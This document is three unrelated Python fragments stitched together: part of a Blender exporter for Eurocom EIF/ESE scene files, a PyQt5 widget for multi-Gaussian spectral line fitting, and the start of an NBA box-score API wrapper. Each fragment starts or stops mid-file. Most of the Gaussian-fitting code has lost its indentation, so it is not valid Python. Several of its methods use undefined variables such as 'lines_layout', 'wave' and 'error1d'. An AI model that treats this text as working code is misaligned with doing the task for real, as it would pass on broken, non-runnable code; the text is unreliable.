        # Collect the operator's properties as keyword arguments, dropping
        # the ones handled here or irrelevant to the writer.
        keywords = self.as_keywords(ignore=("axis_forward",
                                            "axis_up",
                                            "global_scale",
                                            "check_existing",
                                            "filter_glob",
                                            "path_mode",
                                            ))
        # Uniform scale combined with a Y/Z axis swap (Blender is Z-up,
        # the target format expects Y-up).
        global_matrix = (Matrix.Scale(self.global_scale, 4) @ Matrix(((1, 0, 0),(0, 0, 1),(0, 1, 0))).to_4x4())
        keywords["global_matrix"] = global_matrix
        return export_eif.save(context, **keywords)

    def draw(self, context):
        # UI is provided by the EIF_EXPORT_PT_* sub-panels.
        pass
class EIF_EXPORT_PT_output_options(bpy.types.Panel):
    """File-browser sub-panel exposing the EIF exporter's output options."""
    bl_space_type = 'FILE_BROWSER'
    bl_region_type = 'TOOL_PROPS'
    bl_label = "Output Options"
    bl_parent_id = "FILE_PT_operator"

    @classmethod
    def poll(cls, context):
        # Only show this panel while the EIF export operator is active.
        operator = context.space_data.active_operator
        return operator.bl_idname == "EXPORT_SCENE_OT_eif"

    def draw(self, context):
        operator = context.space_data.active_operator
        layout = self.layout
        layout.prop(operator, 'Output_Map')
        layout.prop(operator, 'Output_Transform')
class EIF_EXPORT_PT_scale(bpy.types.Panel):
    """File-browser sub-panel exposing the EIF exporter's scale setting."""
    bl_space_type = 'FILE_BROWSER'
    bl_region_type = 'TOOL_PROPS'
    bl_label = "Transform"
    bl_parent_id = "FILE_PT_operator"

    @classmethod
    def poll(cls, context):
        # Only show this panel while the EIF export operator is active.
        operator = context.space_data.active_operator
        return operator.bl_idname == "EXPORT_SCENE_OT_eif"

    def draw(self, context):
        operator = context.space_data.active_operator
        self.layout.prop(operator, "global_scale")
@orientation_helper(axis_forward='Z', axis_up='Y')
class ExportESE(bpy.types.Operator, ExportHelper):
    """Save a dynamic 3ds Max Euroland file; for cutscenes and maps"""
    bl_idname = "export_scene.ese"
    bl_label = 'Export ESE'
    bl_options = {'PRESET'}

    # File-browser filter: only show .ese files.
    filename_ext = ".ese"
    filter_glob: StringProperty(default="*.ese", options={'HIDDEN'})

    #Output Options
    Output_Materials: BoolProperty(
        name="Materials",
        description="Output scene materials.",
        default=False,
    )
    Output_CameraLightAnims: BoolProperty(
        name="Animated Camera/Light settings",
        description="Export animations from Camera and Light object types.",
        default=False,
    )
    Output_Animations: BoolProperty(
        name="Animations",
        description="Export animations.",
        default=True,
    )

    #Output Types
    object_types: EnumProperty(
        name="Output Types",
        options={'ENUM_FLAG'},
        items=(('CAMERA', "Cameras", ""),
               ('LIGHT', "Lights", ""),
               ('MESH', "Mesh", ""),
               ),
        description="Which kind of object to export",
        default={'CAMERA', 'LIGHT', 'MESH'}
    )

    #Mesh Options
    Output_VertexColors : BoolProperty(
        name="Vertex Colors",
        description="Export vertex colors from each mesh",
        default=False,
    )
    Flip_Polygons: BoolProperty(
        name="Flip Polygons",
        description="Flip polygons direction in which polygon faces.",
        default=False,
    )

    #Scale Options
    global_scale: FloatProperty(
        name="Scale",
        min=0.01,
        max=1000.0,
        default=1.0,
    )

    path_mode: path_reference_mode
    check_extension = True

    def execute(self, context):
        from mathutils import Matrix
        from . import export_ese
        # Collect the operator's properties as keyword arguments, dropping
        # the ones handled here or irrelevant to the writer.
        keywords = self.as_keywords(ignore=("axis_forward",
                                            "axis_up",
                                            "global_scale",
                                            "check_existing",
                                            "filter_glob",
                                            "path_mode",
                                            ))
        # Uniform scale combined with a Y/Z axis swap (Blender is Z-up,
        # the target format expects Y-up).
        global_matrix = (Matrix.Scale(self.global_scale, 4) @ Matrix(((1, 0, 0),(0, 0, 1),(0, 1, 0))).to_4x4())
        keywords["global_matrix"] = global_matrix
        return export_ese.save(context, **keywords)

    def draw(self, context):
        # UI is provided by the ESE_EXPORT_PT_* sub-panels.
        pass
#===============================================================================================
# ESE OUTPUT PANELS OPTIONS
#===============================================================================================
class ESE_EXPORT_PT_output_options(bpy.types.Panel):
    """File-browser sub-panel exposing the ESE exporter's output options."""
    bl_space_type = 'FILE_BROWSER'
    bl_region_type = 'TOOL_PROPS'
    bl_label = "Output Options"
    bl_parent_id = "FILE_PT_operator"

    @classmethod
    def poll(cls, context):
        # Only show this panel while the ESE export operator is active.
        operator = context.space_data.active_operator
        return operator.bl_idname == "EXPORT_SCENE_OT_ese"

    def draw(self, context):
        operator = context.space_data.active_operator
        layout = self.layout
        layout.prop(operator, 'Output_Materials')
        layout.prop(operator, 'Output_CameraLightAnims')
        layout.prop(operator, 'Output_Animations')
class ESE_EXPORT_PT_mesh_options(bpy.types.Panel):
    """File-browser sub-panel exposing the ESE exporter's mesh options."""
    bl_space_type = 'FILE_BROWSER'
    bl_region_type = 'TOOL_PROPS'
    bl_label = "Mesh Options"
    bl_parent_id = "FILE_PT_operator"

    @classmethod
    def poll(cls, context):
        # Only show this panel while the ESE export operator is active.
        operator = context.space_data.active_operator
        return operator.bl_idname == "EXPORT_SCENE_OT_ese"

    def draw(self, context):
        operator = context.space_data.active_operator
        layout = self.layout
        layout.prop(operator, 'Flip_Polygons')
        layout.prop(operator, 'Output_VertexColors')
class ESE_EXPORT_PT_object_types(bpy.types.Panel):
    """Headerless file-browser sub-panel with the exported object types."""
    bl_space_type = 'FILE_BROWSER'
    bl_region_type = 'TOOL_PROPS'
    bl_label = ""
    bl_parent_id = "FILE_PT_operator"
    bl_options = {'HIDE_HEADER'}

    @classmethod
    def poll(cls, context):
        # Only show this panel while the ESE export operator is active.
        operator = context.space_data.active_operator
        return operator.bl_idname == "EXPORT_SCENE_OT_ese"

    def draw(self, context):
        operator = context.space_data.active_operator
        self.layout.column().prop(operator, "object_types")
class ESE_EXPORT_PT_scale(bpy.types.Panel):
    """File-browser sub-panel exposing the ESE exporter's scale setting."""
    bl_space_type = 'FILE_BROWSER'
    bl_region_type = 'TOOL_PROPS'
    bl_label = "Transform"
    bl_parent_id = "FILE_PT_operator"

    @classmethod
    def poll(cls, context):
        # Only show this panel while the ESE export operator is active.
        operator = context.space_data.active_operator
        return operator.bl_idname == "EXPORT_SCENE_OT_ese"

    def draw(self, context):
        operator = context.space_data.active_operator
        self.layout.prop(operator, "global_scale")
# Module-level memo of the last edited object/selection so the handler only
# refreshes the flag UI when the selection actually changes. ``False`` is the
# "nothing seen yet" sentinel (distinct from any object or index list).
last_sel_object = False
last_sel_indexes = False

def scene_update_post_handler(scene):
    """Depsgraph/scene-update handler: mirror the per-vertex/per-face
    Euroland flag bitfield of the current edit-mesh selection into the
    ``euroland`` enum properties so the UI shows the toggled flags.
    """
    context = bpy.context

    # Only meaningful while editing a mesh.
    if not (context.object is not None and context.object.type == 'MESH' and bpy.context.mode == 'EDIT_MESH'):
        return

    cur_sel_object = context.object
    cur_sel_indexes = []

    # swy: this is a bit backwards, because you can select both at the same time, but works
    in_vtx_sel_mode = context.tool_settings.mesh_select_mode[0]
    in_fac_sel_mode = context.tool_settings.mesh_select_mode[2]

    # swy: make it not work at all in edge mode or whenever both of them are toggled on; use an
    #      exclusive or / xor operation, so that we only return True if either of them is on
    if in_vtx_sel_mode ^ in_fac_sel_mode:
        # OR together the flag bitfields of every selected element and
        # remember which elements were selected.
        thing = 0
        def callback(elem, layer):
            # use the parent function's scope: https://stackoverflow.com/a/8178808/674685
            nonlocal thing; nonlocal cur_sel_indexes
            if (elem.select):
                thing |= elem[layer]
                cur_sel_indexes.append(elem.index)

        # NOTE(review): iterate_over_mesh is defined elsewhere in this file;
        # presumably it walks verts or faces depending on the select mode.
        iterate_over_mesh(context, callback)

        # swy: detect if we need to refresh the currently toggled flag elements;
        #      only do that if the selection changes; different, not every time
        #      Note: if we don't do this, we won't let the user change it
        global last_sel_object;
        global last_sel_indexes

        if cur_sel_object != last_sel_object:
            last_sel_indexes = False

        if cur_sel_indexes == last_sel_indexes:
            return

        last_sel_object = cur_sel_object
        last_sel_indexes = cur_sel_indexes

        # --
        if in_vtx_sel_mode:
            # Push the combined bitfield into the vertex-flags enum set,
            # but only when it differs, to avoid update-callback loops.
            selected = bitfield_to_enum_property(context.active_object.data.euroland, 'vertex_flags', thing)
            if context.active_object.data.euroland.vertex_flags != selected:
                context.active_object.data.euroland.vertex_flags = set((i.identifier) for i in selected)
                context.active_object.data.euroland.vertex_flags.update()
        elif in_fac_sel_mode:
            selected = bitfield_to_enum_property(context.active_object.data.euroland, 'face_flags', thing)
            if context.active_object.data.euroland.face_flags != selected:
                context.active_object.data.euroland.face_flags = set((i.identifier) for i in selected)
                context.active_object.data.euroland.face_flags.update()
    return
def update_after_enum(self, context):
    """Update callback for the Euroland flag enum properties (debug trace)."""
    print('self.face_flags ---->', self.face_flags)
class EuroProperties(bpy.types.PropertyGroup):
    ''' Per-face bitfield for Euroland entities. '''
    # Each enum identifier is the hex value of one bit in the Euroland
    # bitfield; ENUM_FLAG makes the property behave as a set of toggles.
    # NOTE(review): bare (None) entries presumably act as UI separators in
    # the enum items list — confirm against the Blender API version in use.
    face_flags: bpy.props.EnumProperty(
        name = "Eurocom face flags",
        options = {'ENUM_FLAG'},
        items = [
            # swy: configurable per-project flags
            ("",       "Project Flags", ""),
            ("0x0001", "Water / NoJump (line seg.)", "0x0001"),
            ("0x0002", "UnderWater / Ladder (line seg. and line poly)", "0x0002"),
            ("0x0004", "Slippery (line poly) / Wall (line seg.) / NoDive (normal poly)", "0x0004"),
            ("0x0008", "Moveable / Edge (line seg.)", "0x0008"),
            (None),
            ("0x0010", "Riser / ZipHandle (grab poly)", "0x0010"),
            ("0x0020", "No Camera Collision", "0x0020"),
            ("0x0040", "No Char Lighting", "0x0040"),
            ("0x0080", "User Flag8", "0x0080"),
            (None),
            ("0x0100", "DualSide Collision", "0x0100"),
            ("0x0200", "Flag10", "0x0200"),
            ("0x0400", "No Dynamic Lighting", "0x0400"),
            ("0x0800", "No Dynamic Shadows", "0x0800"),
            (None),
            ("0x1000", "No Cast Shadows", "0x1000"),
            ("0x2000", "Dont BSP Poly", "0x2000"),
            ("0x4000", "BSP Only Poly", "0x4000"),
            ("0x8000", "Flag16", "0x8000"),

            # swy: hardcoded Euroland flags
            ("",           "Hardcoded Flags", ""),
            ("0x00010000", "Not backface culled", "0x00010000"),
            ("0x00020000", "Portal", "0x00020000"),
            ("0x00040000", "Invisible", "0x00040000"),
            ("0x00080000", "Line segment", "0x00080000"),
            (None),
            ("0x00100000", "Facetted", "0x00100000"),
            ("0x00200000", "Clip Portal", "0x00200000"),
            ("0x01000000", "No collision", "0x01000000"),
            ("0x02000000", "Always backface culled", "0x02000000")
        ],
        default = set(),
        update = update_after_enum
    )

    # Same idea for per-vertex flags; upper bits are user/cloth flags.
    vertex_flags: bpy.props.EnumProperty(
        name = "Eurocom vertex flags",
        options = {'ENUM_FLAG'},
        items = [
            # swy: configurable per-project flags
            ("",       "Project Flags", ""),
            ("0x0001", "Soft Skin Normal", "0x0001"),
            ("0x0002", "Flag2", "0x0002"),
            ("0x0004", "Flag3", "0x0004"),
            ("0x0008", "Flag4", "0x0008"),
            (None),
            ("0x0010", "Flag5", "0x0010"),
            ("0x0020", "Flag6", "0x0020"),
            ("0x0040", "Flag7", "0x0040"),
            ("0x0080", "Flag8", "0x0080"),
            (None),
            ("0x0100", "User Flag 1", "0x0100"),
            ("0x0200", "User Flag 2", "0x0200"),
            ("0x0400", "User Flag 3", "0x0400"),
            ("0x0800", "User Flag 4", "0x0800"),
            (None),
            ("0x1000", "Cloth Handrail", "0x1000"),
            ("0x2000", "Cloth Breakpoint", "0x2000"),
            ("0x4000", "Cloth Vertex", "0x4000"),
            ("0x8000", "Fixed Cloth Vertex", "0x8000"),
        ],
        default = set(),
        update = update_after_enum
    )
# swy: use a callback function to iterate across the whole thing,
# works with | |
from PyQt5.QtWidgets import QWidget, QGridLayout, QVBoxLayout, QComboBox, QLineEdit, QLabel, QPushButton, QDialog, QCheckBox
from PyQt5.QtCore import Qt, pyqtSignal
from PyQt5.QtGui import QDoubleValidator
from PyQt5 import QtWidgets
import matplotlib
matplotlib.use('Qt5Agg')
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg
from matplotlib.figure import Figure
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
import numpy as np
import pandas as pd
from scipy.interpolate import splrep, splev
from scipy.optimize import curve_fit
from IGM.rb_setline import read_line_list
class Gaussfit_2d(QWidget):
send_linelist = pyqtSignal(object)
send_lineindex = pyqtSignal(int)
send_waves = pyqtSignal(object)
send_gfinal = pyqtSignal(list)
send_ransac = pyqtSignal(object)
def __init__(self,wave, flux1d,error1d, gauss_num=2, linelists=[]):
super().__init__()
self.gauss_num = gauss_num
self.waves = np.array([-1] * gauss_num)
self.names = np.array([None] * gauss_num)
self.linelists = linelists
self.result = None
self.wave, self.flux1d, self.error1d = wave, flux1d, error1d
self.kernel_size = 149
self.cont = None
self.c = None # placeholder for ransac cont_fitter object
layout = QVBoxLayout()
# sublayout for Guess z functions
lines_layout = QGridLayout()
lines_layout.addWidget(QLabel('Linelist'), 0,0)
self.line_combo = QComboBox()
self.line_combo.setFixedWidth(120)
self.line_combo.addItems(self.linelists)
lines_layout.addWidget(self.line_combo, 1, 0)
l_zf = QLabel('Estimated z')
l_zf.setFixedHeight(20)
lines_layout.addWidget(l_zf, 0, 1)
self.zf = QLineEdit()
self.zf.setPlaceholderText('Redshift')
self.zf.setFixedWidth(100)
self.zf.setReadOnly(True)
lines_layout.addWidget(self.zf, 1,1)
l_zferr = QLabel('Estimated Error')
l_zferr.setFixedHeight(20)
lines_layout.addWidget(l_zferr, 0, 2)
self.zferr = QLineEdit()
self.zferr.setPlaceholderText('Error')
self.zferr.setFixedWidth(100)
self.zferr.setReadOnly(True)
lines_layout.addWidget(self.zferr, 1,2)
pb = QPushButton('Fit')
pb.setFixedWidth(100)
pb.clicked.connect(self._button_clicked)
lines_layout.addWidget(pb, 1,3)
self.fit_result = QLabel('Ready')
lines_layout.addWidget(self.fit_result, 0, 3)
adv_pb = QPushButton('Advanced')
adv_pb.setFixedWidth(100)
adv_pb.clicked.connect(self._adv_button_clicked)
lines_layout.addWidget(adv_pb, 2,3)
apply_pb = QPushButton('Apply')
apply_pb.setFixedWidth(100)
apply_pb.clicked.connect(self._apply_button_clicked)
lines_layout.addWidget(apply_pb, 3,3)
ion1 = self._create_linelist_widget(lines_layout, 0)
ion2 = self._create_linelist_widget(lines_layout, 1)
ion_widgets = [ion1, ion2]
if self.gauss_num > 2:
ion3 = self._create_linelist_widget(lines_layout, 2)
ion_widgets.append(ion3)
self.line_combo.currentTextChanged.connect(lambda s, iw=ion_widgets: self._linelist_changed(s, iw))
ion1.currentIndexChanged.connect(lambda idx, iw=ion_widgets: self._auto_populate_ions(idx, iw))
self.line1d = LineCanvas()
self.line1d._plot_spec(wave,flux1d, error1d)
mpl_toolbar = NavigationToolbar(self.line1d, self)
self.send_waves.connect(self.line1d._on_sent_waves)
# --- possible implementation ---
# right now it is unstable if linetools is not installed
c_checkbox = QCheckBox('RANSAC')
# apply ransac fitting for continuum if checked
c_checkbox.stateChanged.connect(self._initialize_ransac)
lines_layout.addWidget(c_checkbox, 0, 4)
lines_layout.addWidget(QLabel('Kernel Size'), 1, 4)
self.kernel_ransac = QLineEdit()
self.kernel_ransac.setPlaceholderText('Kernel Size')
self.kernel_ransac.setReadOnly(True)
self.kernel_ransac.setFixedWidth(100)
self.kernel_ransac.returnPressed.connect(self._fit_ransac_continuum)
lines_layout.addWidget(self.kernel_ransac, 2, 4)
cont_pb = QPushButton('Export')
cont_pb.setFixedWidth(100)
cont_pb.clicked.connect(self._export_button_clicked)
lines_layout.addWidget(cont_pb, 3,4)
# main layout
layout.addWidget(mpl_toolbar)
layout.addWidget(self.line1d)
layout.addLayout(lines_layout)
self.setLayout(layout)
self.setFixedSize(1200,800)
def _create_linelist_widget(self, sublayout, col):
l_ion = QLabel('Ion {}'.format(col+1))
l_ion.setFixedHeight(20)
sublayout.addWidget(l_ion, 2, col)
ion_i = QComboBox()
ion_i.setFixedWidth(150)
ion_i.addItem('NONE')
ion_i.setCurrentIndex(0)
ion_i.currentIndexChanged.connect(lambda idx, ion_widget_idx=col: self._ion_i_index_changed(idx, ion_widget_idx))
sublayout.addWidget(ion_i, 3, col)
return ion_i
def _get_linelist_df(self, linelist_name):
llist = pd.DataFrame(columns=['wave', 'name'])
tmp = read_line_list(linelist_name)
#need a line to append wrest to name if it doesn't have one
if any(map(str.isdigit, tmp[1]['ion'])):
# if name column has wrest
for li in tmp:
newrow = {'wave': li['wrest'], 'name': li['ion']}
llist = llist.append(newrow, ignore_index=True)
else:
# if name column doesn't have wrest, need to append
for li in tmp:
newrow = {'wave': li['wrest'], 'name': li['ion']+' '+str(round(li['wrest']))}
llist = llist.append(newrow, ignore_index=True)
return llist
def _on_sent_gauss_num(self, sent_gauss_num):
self.gauss_num = int(sent_gauss_num)
print(self.gauss_num)
ion3 = self._create_linelist_widget(lines_layout, 4)
ion_widgets.append(ion3)
def _ion_i_index_changed(self, i, ion_widget_idx): # i is an int
#self.send_lineindex.emit(i)
if i > 0:
self.waves[ion_widget_idx] = self.linelist.at[i-1, 'wave']
self.names[ion_widget_idx] = self.linelist.at[i-1, 'name']
#print(self.waves)
#print(self.names)
if sum(self.waves > 0) == self.gauss_num:
# now waves contain all selected ion rest wavelength
self.send_waves.emit({ni:wi for ni,wi in zip(self.names, self.waves)})
def _on_sent_linelists2multiG(self, l):
self.LINELISTS = l
def _linelist_changed(self, s, ion_widgets):
for ion_i in ion_widgets:
if s in 'NONE':
self.send_linelist.emit(s)
ion_i.clear()
ion_i.addItem('NONE')
ion_i.setCurrentIndex(0)
else:
self.linelist = self._get_linelist_df(s)
ion_i.clear()
ion_i.addItems(['ALL'] + self.linelist['name'].tolist())
self.send_linelist.emit(self.linelist)
ion_i.setCurrentIndex(0)
#print(self.linelist)
def _button_clicked(self, check):
show_sigfig = 5
print('Begin fitting multiple Gaussians')
self.result = self.line1d.fit(self.cont)
if self.result is not None:
self.zf.setText(str(self.round_to_sigfig(self.result[0], show_sigfig)))
self.zferr.setText(str(self.round_to_sigfig(self.result[1], show_sigfig)))
self.fit_result.setText('Success!')
self.fit_result.setStyleSheet('QLabel {color: #000000}')
else:
self.zf.setText('0')
self.zferr.setText('0')
self.fit_result.setText('Failure!')
self.fit_result.setStyleSheet('QLabel {color: #FF0000}')
self.result = None
def _apply_button_clicked(self, check):
if self.result is not None:
self.send_gfinal.emit(self.result)
def round_to_sigfig(self, num=0., sigfig=1):
if np.isinf(float(num)):
return np.inf
else:
return round(num, sigfig - int(np.floor(np.log10(abs(num)))) - 1)
def _adv_button_clicked(self, check):
print('Change parameter bounds')
if (self.line1d.bounds is None) | (self.line1d.init_guess is None):
print('Please Press Fit button first')
else:
constraint = FittingConstraintDialog(init_guess=self.line1d.init_guess,
bounds=self.line1d.bounds)
if constraint.exec_():
(new_guess, new_bd_low, new_bd_up) = constraint._getvals()
self.line1d.bounds = [new_bd_low, new_bd_up]
self.line1d.init_guess = new_guess
def _fit_ransac_continuum(self):
self.kernel_size = int(self.kernel_ransac.text())
if self.kernel_size % 2 == 0:
self.kernel_size += 1
self.c.fit_continuum(window=self.kernel_size)
self.line1d.axline.lines.pop()
self.line1d.axline.plot(self.wave, self.c.cont, 'b')
self.line1d.draw()
self.cont = self.c.cont
def _initialize_ransac(self, s):
# if the checkbox is checked, initialize ransac
if s == Qt.Checked:
self.kernel_ransac.setReadOnly(False)
self.kernel_ransac.setText(str(self.kernel_size))
from IGM.ransac_contfit import cont_fitter
self.c = cont_fitter.from_data(self.wave, self.flux1d, error=self.error1d)
self.c.fit_continuum(window=self.kernel_size)
self.line1d.axline.plot(self.wave, self.c.cont, 'b')
self.line1d.draw()
self.cont = self.c.cont
else:
self.kernel_ransac.setReadOnly(True)
self.kernel_ransac.clear()
self.cont = None
del self.line1d.axline.lines[2:]
    def _export_button_clicked(self, check):
        """Slot: export the fitted RANSAC continuum as [wave, cont], if any."""
        if self.cont is not None:
            self.send_ransac.emit([self.wave,self.cont])
def _auto_populate_ions(self, i, ion_widgets):
len_items = ion_widgets[0].count()
if len(ion_widgets) < 3:
# double Gaussian
if i+1 < len_items:
ion_widgets[-1].setCurrentIndex(i+1)
else:
ion_widgets[-1].setCurrentIndex(i)
else:
# triple Gaussian
if i+2 > len_items:
ion_widgets[1].setCurrentIndex(i)
ion_widgets[2].setCurrentIndex(i)
if i+2 == len_items:
ion_widgets[1].setCurrentIndex(i+1)
ion_widgets[2].setCurrentIndex(i+1)
else:
ion_widgets[1].setCurrentIndex(i+1)
ion_widgets[2].setCurrentIndex(i+2)
class LineCanvas(FigureCanvasQTAgg):
    def __init__(self, parent=None, width=5, height=3, dpi=100):
        """Matplotlib Qt canvas used for interactive multi-Gaussian fitting.

        :param parent: parent widget.
            NOTE(review): accepted but unused — confirm whether it should be
            forwarded to the base class.
        :param width: figure width in inches.
        :param height: figure height in inches.
        :param dpi: figure resolution.
        """
        # The Figure must exist before FigureCanvasQTAgg.__init__ consumes it.
        self.fig = Figure(figsize=(width, height), dpi=dpi)
        self.fig.subplots_adjust(left=0.1, bottom=0.1, right=0.9, top=0.9)
        super().__init__(self.fig)
        # Grab keyboard focus so key_press_event reaches this canvas.
        self.fig.canvas.setFocusPolicy(Qt.ClickFocus)
        self.fig.canvas.setFocus()
        self.cid_k = self.fig.canvas.mpl_connect('key_press_event', self.ontype)
        # initialization of selected ion wavelength
        # will receive updated wavelength once all ions have been selected
        self.wavelist = []
        self.names = []
        self.init_guess = None
        self.bounds = None
        self.z_guess = 0.
def _plot_spec(self, wave,flux1d,error1d):
self.axline = self.fig.add_subplot(111)
self.axline.cla()
self.axline.plot(wave,flux1d,'k', alpha=0.8)
self.axline.plot(wave,error1d,'r', alpha=0.8)
self.g_wave, self.g_flux, self.g_error = wave, flux1d, error1d
self.axline.set_ylim([np.min(flux1d)*0.8, np.max(flux1d)*1.3])
self.axline.set_xlabel('Wavelength')
self.axline.set_title('Fit Gaussians')
self.draw()
def _plot_line(self, wave_obs):
ax = self.fig.gca()
xlim, ylim = ax.get_xlim(), ax.get_ylim()
self._clear_plotted_lines()
self.z_guess = wave_obs/self.wavelist[0] - 1
self.waves_guess = self.wavelist * (1 + self.z_guess)
self.axline.vlines(x=self.waves_guess,
ymin=ylim[0], ymax=ylim[-1], color='blue', linestyle='dashed')
for i in range(len(self.waves_guess)):
self.axline.text(x=self.waves_guess[i],
y=ylim[-1]*0.6,
s=self.names[i],
color='blue', fontsize=12, rotation='vertical')
self.axline.set_xlim(xlim)
self.axline.set_ylim(ylim)
self.draw()
def _clear_plotted_lines(self):
while self.axline.texts:
self.axline.texts.pop()
while self.axline.collections:
self.axline.collections.pop()
del self.axline.lines[2:]
self.draw()
    def fit(self, ransac_cont=None):
        """Fit a multi-Gaussian profile to the sliced spectrum.

        Mimics the single-Gaussian workflow: (1) estimate a continuum,
        (2) decide whether the features are absorption or emission,
        (3) build initial guesses and bounds, (4) run scipy curve_fit.

        :param ransac_cont: continuum evaluated on ``self.g_wave``; if None,
            a straight line between the two window edges is used instead.
        :returns: [z_best, z_error] on success, None when the fit fails.
        """
        print('Start fitting multi-Gaussian profile...')
        # mimic the single Gaussian fitting process
        # 1. fit a local continuum across the entire window
        #    (linear spline through the first and last pixels)
        if ransac_cont is None:
            spline = splrep([self.g_wave[0], self.g_wave[-1]],
                            [self.g_flux[0], self.g_flux[-1]],
                            k=1)
            cont = splev(self.g_wave, spline)
        else:
            cont = ransac_cont
        # 2. only fit emission lines or absorption lines at once;
        #    the net equivalent width decides which regime applies
        EW = np.sum(cont - self.g_flux)
        if EW > 0:
            # all lines are absorption lines
            sign = -1
        else:
            # all emission lines
            sign = 1
        # initialize guessed values: parameter vector is [z, sigmas..., amps...]
        if self.init_guess is None:
            sig_guess = [20] * len(self.waves_guess)
            # initialize amp's from the flux just blueward of each guessed line
            amp_guess = []
            for wi in self.waves_guess:
                amp_guess.append(self.g_flux[self.g_wave < wi][-1])
            #amp_guess = [3] * len(self.waves_guess)
            p_guess = [self.z_guess] + sig_guess + amp_guess
            self.init_guess = p_guess.copy()
        else:
            p_guess = self.init_guess
        # prepare ydata for fit: continuum-subtracted, flipped positive
        ydata = sign * (self.g_flux - cont)
        # NOTE(review): the continuum is subtracted from the error array as
        # well; sigma for curve_fit is presumably meant to be the raw error
        # array — verify this is intentional.
        errdata = sign * (self.g_error - cont)
        # start fitting process
        model_guess = MultiGauss(self.wavelist)
        if self.bounds is None:
            # allow z to move by +/- 1000 km/s (relativistic Doppler shift)
            SoL = 299792.458 #km/s
            v_uncer = 1000 # km/s
            beta = v_uncer/SoL
            delz = np.sqrt((1.+beta)/(1.-beta)) - 1.
            # NOTE(review): amp_guess is only defined when self.init_guess was
            # None above; this branch assumes bounds and init_guess are always
            # set/reset together — confirm, otherwise this raises NameError.
            self.bd_low = [self.z_guess-delz] + [0] * ((len(p_guess)-1)//2) + (np.array(amp_guess)*0.5).tolist()
            self.bd_up = [self.z_guess+delz] + [100] * ((len(p_guess)-1)//2) + (np.array(amp_guess)*1.5).tolist()
            self.bounds = [self.bd_low, self.bd_up]
        else:
            self.bd_low, self.bd_up = self.bounds[0], self.bounds[-1]
        # if we want to use errdata for estimation
        # No errdata
        try:
            #popt, pcov = curve_fit(model_guess.compile_model, self.g_wave, ydata,
            #                       p0=p_guess, bounds=(bd_low, bd_up))
            # With errdata
            popt, pcov = curve_fit(model_guess.compile_model, self.g_wave, ydata,
                                   p0=p_guess, bounds=(self.bd_low, self.bd_up), sigma=errdata)
            # interpolate with the model parameters
            gfinal = sign * model_guess.compile_model(self.g_wave, *popt) + cont
            perr = np.sqrt(np.diag(pcov))
            # do not forget to bring back to observed frame
            # drop previously drawn fit curves (the first two lines are the
            # spectrum and its error array)
            del self.axline.lines[2:]
            cont_fit = self.axline.plot(self.g_wave, cont, 'b')
            model_fit = self.axline.plot(self.g_wave, gfinal, 'r--')
            self.draw()
            print('\nCurrent multi-Gaussian optimal parameters:')
            print('-----------------------------------------')
            print(f'z = {popt[0]:.4f}, error = {perr[0]:.4f}')
            num_g = int(len(popt)-1) // 2
            for i in range(1, num_g+1):
                print(f'Sigma {i} = {popt[i]:.4f}, error = {perr[i]:.4f}')
                print(f'Amp {i} = {popt[i+num_g]:.4f}, error = {perr[i+num_g]:.4f}')
            print('-----------------------------------------')
            return [popt[0], perr[0]]
        except (RuntimeError, ValueError):
            print('Fitting failed...')
            return None
#------------------- Keyboards/Mouse Events------------------------
def ontype(self, event):
'''Interactivae keyboard events
Note:
Always Update to help mannual for new keyboard events
'''
#print(event.key)
if event.key == 'C':
# Pick the Gaussian Center
self.axline.plot(event.xdata,event.ydata,'r+')
self.g1x_init = event.xdata
self.g1y_init = event.ydata
print('Observed wavelength for Ion 1: {:.2f}'.format(event.xdata))
print('Fitted line wavelengths are ', event.xdata + self.delw)
self._plot_line(event.xdata)
self.draw()
# enable a few keyevent for navigation
elif event.key == 'r':
axline = self.figure.gca()
xlim, ylim = axline.get_xlim(), axline.get_ylim()
self.axline.lines[0] = self.axline.plot(wave,error1d,'r', alpha=0.8)
self.axline.lines[1] = self.axline.plot(wave,flux1d,'k', alpha=0.8)
self.axline.set_xlim(xlim)
self.axline.set_ylim(ylim)
elif event.key == 't':
ylim = self.axline.get_ylim()
self.axline.set_ylim([ylim[0], event.ydata])
self.draw()
elif event.key == 'b':
ylim = self.axline.get_ylim()
self.axline.set_ylim([event.ydata, ylim[-1]])
self.draw()
elif event.key == 'X':
xlim = self.axline.get_xlim()
self.axline.set_xlim([xlim[0], event.xdata])
self.draw()
elif event.key == 'x':
| |
from nba import enums
from nba.utils import clean_locals
from nba.endpoints.baseendpoint import BaseEndpoint
class Boxscores(BaseEndpoint):
def advanced(
self,
game_id,
idx_data,
start_period=enums.StartPeriod.Default,
end_period=enums.EndPeriod.Default,
start_range=enums.StartRange.Default,
end_range=enums.EndRange.Default,
range_type=enums.RangeType.Default,
):
"""
Get advanced box score stats for a given game.
:param game_id: id for the game to get data for.
:type game_id: str
:param idx_data: the index to retrieve data from json.
:type idx_data: int
:param start_period: filter starting quarter to retrieve data for.
:type start_period: nba.nba.bin.enums.StartPeriod
:param end_period: filter upper quarter cutoff for data.
:type end_period: nba.nba.bin.enums.EndPeriod
:param start_range: mandatory in url build, appear to have no effect.
:type start_range: nba.nba.bin.enums.StartRange
:param end_range: mandatory in url build, appear to have no effect.
:type end_range: nba.nba.bin.enums.EndRange
:param range_type: mandatory in url build, appear to have no effect.
:type range_type: nba.nba.bin.enums.RangeType
:returns: data for specified filters, as defined below by idx_data.
:rtype: Dataframe
======== ============ ==================================================
idx_data Name Description
======== ============ ==================================================
0 PlayerStats Advanced box scores on an individual player basis.
1 TeamStats Advanced box scores on a team basis.
======== ============ ==================================================
"""
params = clean_locals(locals())
endpoint = "boxscoreadvancedv2"
r = self.request(endpoint, params)
df = self.process_response(r, idx_data, "resultSets")
return df
def four_factors(
self,
game_id,
idx_data,
start_period=enums.StartPeriod.Default,
end_period=enums.EndPeriod.Default,
start_range=enums.StartRange.Default,
end_range=enums.EndRange.Default,
range_type=enums.RangeType.Default,
):
"""
Get four factors stats for a given game.
:param game_id: id for the game to get data for.
:type game_id: str
:param idx_data: the index to retrieve data from json.
:type idx_data: int
:param start_period: filter starting quarter to retrieve data for.
:type start_period: nba.nba.bin.enums.StartPeriod
:param end_period: filter upper quarter cutoff for data.
:type end_period: nba.nba.bin.enums.EndPeriod
:param start_range: mandatory in url build, appear to have no effect.
:type start_range: nba.nba.bin.enums.StartRange
:param end_range: mandatory in url build, appear to have no effect.
:type end_range: nba.nba.bin.enums.EndRange
:param range_type: mandatory in url build, appear to have no effect.
